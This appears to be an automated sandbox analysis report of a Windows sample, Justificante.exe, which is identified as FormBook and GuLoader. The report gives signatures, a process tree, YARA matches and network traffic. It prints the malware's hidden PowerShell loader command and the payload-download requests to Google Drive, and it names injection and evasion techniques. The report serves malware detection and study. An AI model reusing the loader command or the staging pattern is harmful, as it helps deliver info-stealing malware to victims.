Windows Analysis Report
Justificante.exe

Overview

General Information

Sample name: Justificante.exe
Analysis ID: 1539381
MD5: 73fd5954cb5be48ea11d738097fdda5a
SHA1: 6aab0cb9ddb07d3c3386e6ff72c2f969339e31f7
SHA256: 27d88a843003bf67d0bf917db5a57620810b08c76c91e18d00c3d89c7d459545
Tags: exeuser-malwarelabnet

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Justificante.exe (PID: 1796 cmdline: "C:\Users\user\Desktop\Justificante.exe" MD5: 73FD5954CB5BE48EA11D738097FDDA5A)
    • powershell.exe (PID: 3892 cmdline: "powershell.exe" -windowstyle hidden "$Florsukkeres=Get-Content -raw 'C:\Users\user\AppData\Local\unavailability\unmeliorated\Daredeviltry.Unw';$duncedom=$Florsukkeres.SubString(5663,3);.$duncedom($Florsukkeres) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Apathism.exe (PID: 4512 cmdline: "C:\Users\user\AppData\Local\Temp\Apathism.exe" MD5: 73FD5954CB5BE48EA11D738097FDDA5A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.2616112535.0000000021F90000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.2616112535.0000000021F90000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
    • 0x2bd10:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13f1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2157643801.000000000D563000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

      System Summary

      Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Florsukkeres=Get-Content -raw 'C:\Users\user\AppData\Local\unavailability\unmeliorated\Daredeviltry.Unw';$duncedom=$Florsukkeres.SubString(5663,3);.$duncedom($Florsukkeres), CommandLine: "powershell.exe" -windowstyle hidden "$Florsukkeres=Get-Content -raw 'C:\Users\user\AppData\Local\unavailability\unmeliorated\Daredeviltry.Unw';$duncedom=$Florsukkeres.SubString(5663,3);.$duncedom($Florsukkeres), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Justificante.exe", ParentImage: C:\Users\user\Desktop\Justificante.exe, ParentProcessId: 1796, ParentProcessName: Justificante.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Florsukkeres=Get-Content -raw 'C:\Users\user\AppData\Local\unavailability\unmeliorated\Daredeviltry.Unw';$duncedom=$Florsukkeres.SubString(5663,3);.$duncedom($Florsukkeres), ProcessId: 3892, ProcessName: powershell.exe
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-10-22T16:04:30.150097+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49713 | 142.250.184.238 | 443 | TCP

      AV Detection

      Source: Justificante.exe, Avira: detected
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exe, Avira: detection malicious, Label: TR/Agent.lfkxa
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exe, ReversingLabs: Detection: 39%
      Source: Justificante.exe, ReversingLabs: Detection: 39%
      Source: Yara match, File source: 00000007.00000002.2616112535.0000000021F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
      Source: Justificante.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknown, HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.9:49713 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49715 version: TLS 1.2
      Source: Justificante.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.2156339098.0000000007FEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2147024134.0000000006D2D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb? source: powershell.exe, 00000002.00000002.2156339098.0000000007FEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdb source: Apathism.exe, 00000007.00000001.2139551109.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
      Source: Binary string: wntdll.pdb source: Apathism.exe
      Source: Binary string: System.Core.pdb" source: powershell.exe, 00000002.00000002.2156339098.0000000007FEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Apathism.exe, 00000007.00000001.2139551109.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
      Source: C:\Users\user\Desktop\Justificante.exeCode function: 0_2_00405C4E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4E
      Source: C:\Users\user\Desktop\Justificante.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
      Source: C:\Users\user\Desktop\Justificante.exeCode function: 0_2_0040689A FindFirstFileW,FindClose,0_2_0040689A
      Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49713 -> 142.250.184.238:443
      Source: global traffic, HTTP traffic detected:
        GET /uc?export=download&id=1YmsapsQuJkTPoH8BzP8NzbEbTh6ek1Mh HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Host: drive.google.com
        Cache-Control: no-cache
      Source: global traffic, HTTP traffic detected:
        GET /download?id=1YmsapsQuJkTPoH8BzP8NzbEbTh6ek1Mh&export=download HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Cache-Control: no-cache
        Host: drive.usercontent.google.com
        Connection: Keep-Alive
      Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global traffic, DNS traffic detected: DNS query: drive.google.com
      Source: global traffic, DNS traffic detected: DNS query: drive.usercontent.google.com
      Source: unknown, Network traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknown, Network traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49713
      Source: C:\Users\user\Desktop\Justificante.exeCode function: 0_2_004056E3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056E3

      E-Banking Fraud

      Source: Yara match, File source: 00000007.00000002.2616112535.0000000021F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      System Summary

      Source: 00000007.00000002.2616112535.0000000021F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\Apathism.exe
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exe, Process Stats: CPU usage > 49%
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process Stats: CPU usage > 49%
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_22372C70
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_22372DF0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223735C0 NtCreateMutant,LdrInitializeThunk,7_2_223735C0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22374340 NtSetContextThread,7_2_22374340
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22374650 NtSuspendThread,7_2_22374650
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372AB0 NtWaitForSingleObject,7_2_22372AB0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372AF0 NtWriteFile,7_2_22372AF0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372AD0 NtReadFile,7_2_22372AD0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372B60 NtClose,7_2_22372B60
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372BA0 NtEnumerateValueKey,7_2_22372BA0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372B80 NtQueryInformationFile,7_2_22372B80
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372BF0 NtAllocateVirtualMemory,7_2_22372BF0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372BE0 NtQueryValueKey,7_2_22372BE0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372E30 NtWriteVirtualMemory,7_2_22372E30
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372EA0 NtAdjustPrivilegesToken,7_2_22372EA0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372E80 NtReadVirtualMemory,7_2_22372E80
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372EE0 NtQueueApcThread,7_2_22372EE0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372F30 NtCreateSection,7_2_22372F30
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372F60 NtCreateProcessEx,7_2_22372F60
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372FB0 NtResumeThread,7_2_22372FB0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372FA0 NtQuerySection,7_2_22372FA0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372F90 NtProtectVirtualMemory,7_2_22372F90
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372FE0 NtCreateFile,7_2_22372FE0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372C00 NtQueryInformationProcess,7_2_22372C00
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372C60 NtCreateKey,7_2_22372C60
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372CA0 NtQueryInformationToken,7_2_22372CA0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372CF0 NtOpenProcess,7_2_22372CF0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372CC0 NtQueryVirtualMemory,7_2_22372CC0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372D30 NtUnmapViewOfSection,7_2_22372D30
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372D10 NtMapViewOfSection,7_2_22372D10
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372D00 NtSetInformationFile,7_2_22372D00
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372DB0 NtEnumerateKey,7_2_22372DB0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372DD0 NtDelayExecution,7_2_22372DD0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22373010 NtOpenDirectoryObject,7_2_22373010
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22373090 NtSetValueKey,7_2_22373090
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223739B0 NtGetContextThread,7_2_223739B0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22373D10 NtOpenProcessToken,7_2_22373D10
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22373D70 NtOpenThread,7_2_22373D70
      Source: C:\Users\user\Desktop\Justificante.exeCode function: 0_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004035D8
      Source: C:\Users\user\Desktop\Justificante.exe, File created: C:\Windows\ansttelsesvilkaarets
      Source: C:\Users\user\Desktop\Justificante.exe, File created: C:\Windows\resources\0809
      Source: Justificante.exe, Static PE information: invalid certificate
      Source: Justificante.exe, 00000000.00000000.1417781812.0000000000460000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenamebramstngers.exeP vs Justificante.exe
      Source: Justificante.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: 00000007.00000002.2616112535.0000000021F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: classification engine, Classification label: mal100.troj.evad.winEXE@6/18@2/2
      Source: C:\Users\user\Desktop\Justificante.exe, Code function: 0_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
      Source: C:\Users\user\Desktop\Justificante.exe, Code function: 0_2_00404983 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
      Source: C:\Users\user\Desktop\Justificante.exe, Code function: 0_2_004021A2 CoCreateInstance
      Source: C:\Users\user\Desktop\Justificante.exe, File created: C:\Users\user\AppData\Local\unavailability
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
      Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1544:120:WilError_03
      Source: C:\Users\user\Desktop\Justificante.exe, File created: C:\Users\user\AppData\Local\Temp\nsr6B39.tmp
      Source: Justificante.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\Justificante.exe, File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\Justificante.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: Justificante.exe, ReversingLabs: Detection: 39%
      Source: C:\Users\user\Desktop\Justificante.exe, File read: C:\Users\user\Desktop\Justificante.exe
      Source: unknown, Process created: C:\Users\user\Desktop\Justificante.exe "C:\Users\user\Desktop\Justificante.exe"
      Source: C:\Users\user\Desktop\Justificante.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Florsukkeres=Get-Content -raw 'C:\Users\user\AppData\Local\unavailability\unmeliorated\Daredeviltry.Unw';$duncedom=$Florsukkeres.SubString(5663,3);.$duncedom($Florsukkeres)
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Users\user\AppData\Local\Temp\Apathism.exe "C:\Users\user\AppData\Local\Temp\Apathism.exe"
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: fontext.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: fms.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: msxml3.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: dlnashext.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: wpdshext.dllJump to behavior
      Source: C:\Users\user\Desktop\Justificante.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeSection loaded: msasn1.dllJump to behavior
